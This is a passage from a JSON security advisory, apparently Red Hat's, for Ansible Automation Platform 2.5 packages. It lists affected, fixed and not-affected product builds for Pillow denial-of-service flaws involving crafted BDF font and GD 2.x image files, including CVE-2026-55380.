"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
